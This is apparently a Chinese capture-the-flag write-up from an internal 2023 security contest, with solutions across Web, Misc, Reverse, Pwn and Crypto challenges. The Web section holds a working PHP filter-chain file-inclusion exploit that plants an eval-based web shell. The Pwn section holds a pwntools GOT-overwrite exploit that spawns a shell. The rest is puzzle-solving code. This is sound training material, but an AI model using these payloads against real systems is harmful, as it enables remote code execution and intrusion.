内部赛-2023第三届网络安全攻防大赛团队赛①-线上赛
Web
psms_2
先按提示登录一下。
http://192.168.127.130/?page=php://filter/convert.base64-encode/resource=index
读取源码
https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT 生成 payload
在login.php会判断page参数。
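# Builds a php://filter conversion chain (the PHP_INCLUDE_TO_SHELL_CHAR_DICT technique
# linked above): the per-character iconv chains are read from ./res/<hex code point> and
# joined with the bookkeeping filters, then written into test.php and printed.
file_to_use = "login"
# decoded: <?php eval($_GET[1]);?>a
base64_payload = "PD9waHAgZXZhbCgkX0dFVFsxXSk7Pz5h"

# generate some garbage base64
filters = ["convert.iconv.UTF8.CSISO2022KR", "convert.base64-encode"]
# make sure to get rid of any equal signs in both the string we just generated
# and the rest of the file
filters.append("convert.iconv.UTF8.UTF7")
for c in reversed(base64_payload):
    # dictionary files are named by the character's hex code point (no "0x" prefix);
    # use a context manager so each handle is closed instead of leaking one per character
    with open("./res/" + format(ord(c), "x")) as chain_file:
        filters.append(chain_file.read())
# decode and reencode to get rid of everything that isn't valid base64
filters += ["convert.base64-decode", "convert.base64-encode"]
# get rid of equal signs
filters += ["convert.iconv.UTF8.UTF7", "convert.base64-decode"]

final_payload = f"php://filter/{'|'.join(filters)}/resource={file_to_use}"
with open("test.php", "w") as f:
    f.write('<?php echo file_get_contents("' + final_payload + '");?>')
print(final_payload)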
然后直接打过去
http://192.168.127.130/?page=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.GBK.UTF-8|convert.iconv.IEC_P27-1.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|conv
ert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61|convert.iconv.ISO6937.EUC-JP-MS|convert.iconv.EUCKR.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CN.ISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.ic
onv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=login&1=file_put_contents("1.php", base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4="));
在 1.php中生成马。蚁剑连接即可
easy_java
会的来发wp
Misc
流量分析实战_2
wireshark导出http, 有个图片,里面套了2个图片。分离出来得到flag。
ZIP
用Advanced Archive Password Recovery暴力破解得到密码839,打开txt文件,得到flag。
Matrix
直接按说明螺旋读取像素到 f11.txt,然后把 RGBA 转成黑白,先写行再写列,输出图像,得到解压密码。
from PIL import Image
# Source image, forced to RGBA so every getpixel() call yields a 4-tuple.
img = Image.open('spiral.png').convert('RGBA')
x, y = img.size
# Pixel dump consumed by the reconstruction script: one "r,g,b,a" line per visited pixel.
f = open('f11.txt', 'w', encoding='utf8')
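def get_pixel(x, y):
    """Append the RGBA value of pixel (x, y) of the module-level ``img`` to ``f``.

    Coordinates follow PIL's (column, row) convention. The value is written as one
    comma-separated line. The former per-pixel ``print`` (a million lines for a
    1024x1024 image) and the unused ``r, g, b, a`` unpacking were dropped.
    """
    rgba = img.getpixel((x, y))
    f.write(','.join(str(channel) for channel in rgba) + '\n')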
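def function(n):
    """Walk an n x n grid in a clockwise spiral and dump every visited pixel.

    Order per ring: top row left->right, right column top->bottom, bottom row
    right->left, left column bottom->top; each leg stops one short of its corner,
    which the next leg takes. Every visited cell gets its visit number in the
    returned matrix and is passed to ``get_pixel(x, y)`` (x = column, y = row).

    Returns the n x n list of visit numbers.
    """
    matrix = [[0] * n for _ in range(n)]
    number = 1
    left, right, up, down = 0, n - 1, 0, n - 1
    while left < right and up < down:
        # left to right along the top row
        for i in range(left, right):
            matrix[up][i] = number
            number += 1
            get_pixel(i, up)
        # top to bottom along the right column
        for i in range(up, down):
            matrix[i][right] = number
            number += 1
            get_pixel(right, i)
        # right to left along the bottom row
        for i in range(right, left, -1):
            matrix[down][i] = number
            number += 1
            get_pixel(i, down)
        # bottom to top along the left column
        for i in range(down, up, -1):
            matrix[i][left] = number
            number += 1
            get_pixel(left, i)
        left += 1
        right -= 1
        up += 1
        down -= 1
    # for odd n the single centre cell is not covered by any leg; it must be numbered
    # and dumped too, otherwise the dump is one pixel short
    if n % 2 != 0:
        matrix[n // 2][n // 2] = number
        get_pixel(n // 2, n // 2)
    return matrix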
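function(1024)
# flush and close the dump so the reconstruction script reads complete data
f.close()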
from PIL import Image
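# Rebuild the dumped spiral pixels as a size x size image: line k of f11.txt becomes
# pixel (k % size, k // size), i.e. rows are filled first. White stays white; any
# other value becomes transparent black, giving a two-colour image.
size = 1024
with open('f11.txt', 'r', encoding='utf8') as dump:
    lines = dump.read().splitlines()
img = Image.new("RGBA", (size, size), color=(255, 255, 255, 255))  # default white
for num, line in enumerate(lines):
    rgba = [int(channel) for channel in line.split(',')]
    x, y = num % size, num // size
    if rgba == [255, 255, 255, 255]:
        img.putpixel((x, y), (255, 255, 255, 255))
    else:
        img.putpixel((x, y), (0, 0, 0, 0))
img.save('res.png')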
png_2
拆分 PNG 文件,补齐文件头。扫码得 flag。
Re
Firm
按这个配置 https://www.bilibili.com/video/BV1LX4y157TP/
配置好后一眼就能看出是 RC4。根据提示,需要求出 key。
rc4init(&sbox[4], 0, 252);
strcpy(tbox, "flag{tH14.l4_F@kKkEeeE---f41g}");
*(_DWORD *)key = 0xF4DD0F64;
*(_DWORD *)&key[4] = 0x5173B9F8;
*(_DWORD *)&key[8] = 0xC7D238B2;
*(_DWORD *)&key[12] = 0x9B9FCA8;
*(_DWORD *)&key[16] = 0x286D3C51;
*(_DWORD *)&key[20] = 0x429DE399;
*(_DWORD *)&key[24] = 0x8084307B;
*(_WORD *)&key[28] = 0x9175;
while ( 1 )
{
do
{
while ( fn3(0x40010800, 0x1000) )
;
sub_80005AC(0xAu);
}
while ( fn3(0x40010800, 0x1000) );
v1 = sub_80001B4() | v0;
v17[0] = v1;
if ( v1 >= 0x1000000 )
{
v23 = 0;
rc4init(&v24, 0, 252);
b1 = &t5;
k = &t5;
for ( i = 0; i != 256; ++i )
*++k = i;
v5 = &sbox[255];
v6 = &sbox[255];
然后直接爆破吧。按 md5 提交。
from itertools import product
# String copied into tbox by the decompiled strcpy above.
xorkey = "flag{tH14.l4_F@kKkEeeE---f41g}"
# The 30 bytes of the decompiled key[] constants, in memory (little-endian dword) order.
enc = bytearray.fromhex(
    "640fddf4f8b97351b238d2c7a8fcb909"
    "513c6d2899e39d427b3084807591"
)
from Crypto.Cipher import ARC4
def rc4_crypt(msg, key):
    """Return msg XORed with the RC4 keystream for key (RC4 is symmetric, so this also encrypts)."""
    return ARC4.new(key).decrypt(msg)
# Try every 4-byte key over printable ASCII 0x20..0x7e and stop at the first one
# that maps xorkey onto the 30 recovered bytes.
printable = range(0x20, 0x7f)
for candidate in product(printable, repeat=4):
    key = bytearray(candidate)
    if rc4_crypt(xorkey.encode(), key) == enc:
        print('get')
        print(key)
        exit(0)
再写个c版的
#include <stdio.h>
#include <string.h>
void bf(size_t count, char start, char anEnd, void (*callback)(const char*));
void print_combination(const char *combination);
#include <string.h>
#include <assert.h>
#include "stdio.h"
/* Key scheduling: fill s[0..255] with the RC4 permutation derived from key[0..Len-1]. */
void rc4_init(unsigned char *s, unsigned char *key, unsigned long Len) {
    unsigned char k[256];
    int i, j = 0;

    /* identity permutation alongside the key repeated to 256 bytes */
    for (i = 0; i < 256; i++) {
        s[i] = (unsigned char)i;
        k[i] = key[i % Len];
    }
    /* mixing pass: swap s[i] with s[j], j accumulating s[i] + k[i] */
    for (i = 0; i < 256; i++) {
        unsigned char tmp;
        j = (j + s[i] + k[i]) % 256;
        tmp = s[i];
        s[i] = s[j];
        s[j] = tmp;
    }
}
/* Keystream generation: XOR Data[0..Len-1] with the RC4 keystream of state s.
 * s is advanced in place, so the same call decrypts what it encrypted. */
void rc4_crypt(unsigned char *s, unsigned char *Data, unsigned long Len) {
    int i = 0, j = 0;
    unsigned long k;

    for (k = 0; k < Len; k++) {
        unsigned char tmp;
        i = (i + 1) % 256;
        j = (j + s[i]) % 256;
        tmp = s[i];
        s[i] = s[j];
        s[j] = tmp;
        Data[k] ^= s[(s[i] + s[j]) % 256];
    }
}
int main() {
    /* unbuffered stdout so the callback's progress output is visible immediately */
    setbuf(stdout, NULL);
    /* 4-byte keys over printable ASCII 0x20..0x7f inclusive */
    bf(4, 0x20, 0x7f, print_combination);
    return 0;
}
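/*
 * Enumerate every string of `count` characters from [start, anEnd] (inclusive), the
 * last position varying fastest. Each candidate is handed to `callback`, then tried
 * as an RC4 key against the 30 constant bytes; on a match the key is printed and the
 * search stops. Returns after the last candidate, the first hit, or at once if
 * count is 0 (the original looped forever and divided by zero in rc4_init there).
 *
 * Fixes versus the original: data had no NUL terminator and key was never
 * terminated, so strlen() on both read past the buffers; the 30-byte result was
 * written into a 17-byte enc[] via sprintf (stack overflow); and the whole test
 * ran once per carry position instead of once per candidate.
 */
void bf(size_t count, char start, char anEnd, void (*callback)(const char *combination)) {
    /* the 30 bytes from the firmware and the plaintext they must decrypt to */
    static const unsigned char data[] = {0x64, 0x0F, 0xDD, 0xF4, 0xF8, 0xB9, 0x73, 0x51, 0xB2, 0x38,
                                         0xD2, 0xC7, 0xA8, 0xFC, 0xB9, 0x09, 0x51, 0x3C, 0x6D, 0x28,
                                         0x99, 0xE3, 0x9D, 0x42, 0x7B, 0x30, 0x84, 0x80, 0x75, 0x91};
    static const char expected[] = "flag{tH14.l4_F@kKkEeeE---f41g}";
    char arr[count + 1];
    size_t i;

    if (count == 0) return;
    arr[count] = '\0';
    for (i = 0; i < count; ++i) {
        arr[i] = start;
    }
    while (1) {
        unsigned char sbox[256];
        unsigned char buf[sizeof data];
        size_t j;

        (*callback)(arr);

        /* test the current candidate exactly once; key length is count, not strlen() */
        memcpy(buf, data, sizeof data);
        rc4_init(sbox, (unsigned char *)arr, count);
        rc4_crypt(sbox, buf, sizeof buf);
        if (memcmp(buf, expected, sizeof buf) == 0) {
            printf("get key: %s\n", arr);
            return;
        }

        /* odometer increment with carry, from the last position downwards */
        for (j = count; j-- > 0;) {
            if (arr[j] == anEnd) {
                if (j == 0) return; /* every position has wrapped: search space exhausted */
                arr[j] = start;
            } else {
                arr[j]++;
                break;
            }
        }
    }
}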
/* Progress callback for bf(): echo the candidate on its own line. */
void print_combination(const char *combination) {
    puts(combination);
}
Pwn
橘子
from pwn import *
context.log_level = 'debug'
o = process("./pwn")
# o = remote("00.00.00.00", 0000)
elf = ELF("./pwn")
libc = ELF("./libc-2.23.so")


def choose(option):
    """Answer the menu prompt (the binary's misspelling 'chioce' is reproduced on purpose)."""
    o.sendlineafter(b"input your chioce:", option)


def write_entry(index, size, content):
    """Menu option 2 as driven in the writeup: index, size, then raw content."""
    choose(b'2')
    o.sendlineafter(b"Index :\n", index)
    o.sendlineafter(b"Size :\n", size)
    o.sendafter(b"Content :\n", content)


def show_entry(index):
    """Menu option 3: select an index and return the first 6 raw bytes echoed back."""
    choose(b'3')
    o.sendlineafter(b"Index :\n", index)
    return o.recv(6)


write_entry(b"-72", b'8', p64(elf.got['puts']))
puts_addr = u64(show_entry(b"-40") + b'\x00\x00')
libc_base = puts_addr - libc.sym['puts']
log.info(hex(libc_base))
write_entry(b"-40", b'8', p64(libc_base + 0x45226))
o.interactive()
Crypto
Math
第一部分求取n与hint1的公因子,可以得到素因子r
第二部分分析myfunction函数:
\(\begin{align*} output &= \Sigma_{i=0}^{num-1} (6*i+6*j+1)\\ &= \Sigma 6*i + 6*\Sigma_{k=0}^{i-1}k + 1 \\ &= \Sigma_{i=0}^{num-1} 6*i + 3*i*(i-1) + 1\\ &= num + \frac{3*num*(num-1)}{2} + \frac{(num-1)*num*(2*num-1)}{2}\\ &\Rightarrow output = 0 \pmod{num^2} \\ &\Rightarrow hint_2 = 3*lp*n + 1 \pmod{n^2} \end{align*}\)
利用hint2的值可以计算出素因子p的低400bit,使用coppersmith求解高位即得到素因子p的值
至此,大整数n的三个素因子pqr已经成功分解,可以解密rsa得到m的值
第三部分分析All函数,由幂级数分析知\(T.Point(i) = Sqrt(i)\),因此:
\(\begin{align*} output &= \Sigma_{i=3}^{bound-1}\frac{Sqrt(i) + Sqrt(i+1)}{2} \\ &= \Sigma_{i=3}^{bound-1} \frac{Sqrt(i)}{2} + \Sigma_{i=4}^{bound} \frac{Sqrt(i)}{2}\\ &= \frac{(bound)^{\frac{3}{2}} + (bound+1)^{\frac{3}{2}} - 3^{\frac{3}{2}} - 4^{\frac{3}{2}}}{3} \end{align*}\)
计算出k的值,将k与m的值处理后异或得到flag
# sage
# Length in bytes of the final flag; also the slice width taken from k and m at the end.
flag_len = 42
# RSA modulus; per the analysis above it is a product of three primes p, q, r.
n = 1885106209951408608833065466098355578239648885277085979696889428331716535742564778501798478665957825315340421821880653818505857049636611632357321104069926874970489073929053910350131880591544986024406953378391135673202854750625745159391997973535848495128365477217006260495413869532372418221652962946340513593002422433536479789576519469228846773250447077165756739529520975715667675188738514871033908115371290569902086064227476952606366538782284487477820835988316471
# RSA ciphertext of m.
c = 696238728213276154324787695659767792043458798396732235983493075871691401810545168845655490352789752222363100922123671319198981013421632076090146254867823593523050502577701155837063376958530879006719716789887624440134559774538443909463537086796915613123528679984244371544503657821859556837415229166015914540860398289216765611441964228176020361651359395184571105468667815326494558761738459063914192172836518999575866452752941368767971539919141604299843463853501960
# Shares the prime factor r with n (recovered with a gcd below).
hint1 = 47533994701669017942592643580845693193316601935087923279407365999451221242084261195588230994183718077379066856479267476895986608547324057765879168010176037349172136581929046771540241367625486215731295814611283581608613208990206581757576978017732022062210538697720930605552259306749633658032304554578427461842934055558865521604512892691323385156889995854702621568441768712619224249280792783364635307739215957762771386413831279443875185633720270001928747743847856394847878232194076679733830705297410959656270945532930199517880949
# Equals 3*lp*n + 1 (mod n^2) per the derivation above, where lp is the low 400 bits of p.
hint2 = 1345739841248959791137389026125065605121513428784838684290299665636596562317989590469829195181078904857051392378877013458099983407103737518119999468489762053545474516182879516762580472262640794849609626308003164739287189671066241628052826558582865342176036139097546843281565147798609965645514151827840249686650855385385323417455247722134760335695053787221300451942370377598800841980049138341564555801417479362085565640973199260631136149016266661293883650801813550118778433333591258278147003619871962070136454674193198696690506092831171400435490432196636796719177624389194619648086397178720207413652618636521150924913978530986709499047969775311955879302418093270101476537853298615347062384026172441455857088955847766335746521291043747795520485020303040819568036819058385444936925860671650596681910380157657689041971132993731048618045570715513584627109356139903842365556697314631573799394266292587334468008221427502353566938518574247502783245674619641519095644135976062817840893465238031354234069073928763492529419021632732679912738674105898149050223970723297059883534089683179512881491210176114419520070007595698242827625902377045860953285447617249204919971737086366
# i: 0-num-1
# j: \Sigma_0^{i-1} = (i-1)*i/2
# output: \Sigma 6i+6j+1 -> num + 3*Sigma(i) + 3*Sigma (i^2) -> num + 3*(num-1)*num/2 + (num-1)*num*(2*num-1)/2
# => mod = 0 (mod n^2)
# => hint2 = 3*lp*n + 1
def q_myfunction(num):
    """Closed form of the challenge's myfunction: sum over i < num of 6*i + 6*j(i) + 1,
    with j(i) = i*(i-1)/2.

    Splitting the sum gives num + 3*sum(i) + 3*sum(i^2); both products below are even,
    so the floor divisions are exact. (The terms telescope to num**3, which is why the
    result is a multiple of num**2.)
    """
    linear = 3 * num * (num - 1) // 2
    square = num * (num - 1) * (2 * num - 1) // 2
    return num + linear + square
# Point(center) -> sqrt(center)
# All(bound) = Sigma_{i=3}^{bound-1} (Point(i) + Point(i+1)) / 2
# All(bound) = Sigma_{i=3}^{bound-1} Point(i)/2 + Sigma_{i=3}^{bound-1} Point(i+1)/2
# All(bound) = f(bound) + f(bound+1) - f(3) - f(4)
def q_All(bound):
    """Closed form of the challenge's All(bound): with Point(i) = sqrt(i) the averaged
    neighbour sum telescopes to f(bound) + f(bound + 1) - f(3) - f(4), where
    f(x) = x^(3/2) / 3. The result is rounded to the nearest integer.
    """
    def f(x):
        return sqrt(x ** 3) / 3
    total = f(bound) + f(bound + 1) - f(3) - f(4)
    return int(total.round())
# Part 1: hint1 shares the prime r with n.
r = gcd(n, hint1)
# Part 2: myfunction(n) is a multiple of n^2 (see the derivation above), so
# hint2 = 3*lp*n + 1 (mod n^2) leaks lp, the low 400 bits of p; the remaining
# high bits (bounded by 2^112) come from Coppersmith's small_roots.
assert q_myfunction(n) % n**2 == 0
lp = ((hint2 - 1) // n) * inverse_mod(3, n) % n
R = PolynomialRing(Zmod(n // r), 'x')
x = R.gen()
f = x * 2**400 + lp
roots = f.monic().small_roots(X=2**112, beta=0.4, epsilon=0.05)
p = int(roots[0] * 2**400 + lp)
q = n // (r * p)
# Textbook RSA decryption with the three-prime totient, then the All() closed form for k.
phi = (p - 1) * (q - 1) * (r - 1)
m = int(power_mod(c, inverse_mod(65537, phi), n))
k = q_All(n)
print(k)
print(m)
pip3 install pycryptodome
python
脚本
from Crypto.Util.number import *
from Crypto.Util.strxor import strxor
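# Recover the flag from the two values printed by the Sage script above: the top
# flag_len bytes of k are XORed with the first flag_len bytes of m.
# flag_len is re-declared here because this runs in a fresh interpreter, where the
# Sage script's definition does not exist (the original raised NameError).
flag_len = 42
k = 1725490120691188977680801867268140317180866567184633816990773897414250041053071846552746468670403579164534282324880877191090563667724329805671136851331399964592724852151079596574327952778864262234480446294407714108339709290342228564235547085394128599431757611753190980192853546038426666697909244474806985963092628116534163492986542344866325828836263051101493171761508979316839471579268072635782005059440060473936978405674039384693849714039996204381285389108635299521920093753533122242788625872805502762015954028389721763351835165159462453407764814558080506621939080790569219875550951691983330371610868596149763698827962621406416674641721708079682683853213408545250020671944108242756094754464508
m = 19894460456609555207141061120215061100672222195573875603062923560352656107168638392636383064883699622103499433418273590323681358433240609501160649046445135408992683042105925775331604863270063149446744906836114988556294567039453806150715544405637329807186077487136724139201359030326054589492264168333429507981168991945650732574444912703747559357669819076763666696748139319621405402912373679015748260200384412165637497627755720960768809057628444943258820056314


def _to_bytes(value):
    """Big-endian minimal encoding of a positive int (stdlib equivalent of long_to_bytes)."""
    return value.to_bytes((value.bit_length() + 7) // 8, 'big')


k = _to_bytes(k >> (k.bit_length() - 8 * flag_len))
m = _to_bytes(m)[:flag_len]
# stdlib equivalent of Crypto.Util.strxor.strxor, which also demands equal lengths
if len(m) != len(k):
    raise ValueError("strxor operands must have equal length")
flag = bytes(a ^ b for a, b in zip(m, k))
print(flag)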
# flag{84934a62-f932-968c-fa88-22f0284c0e8e}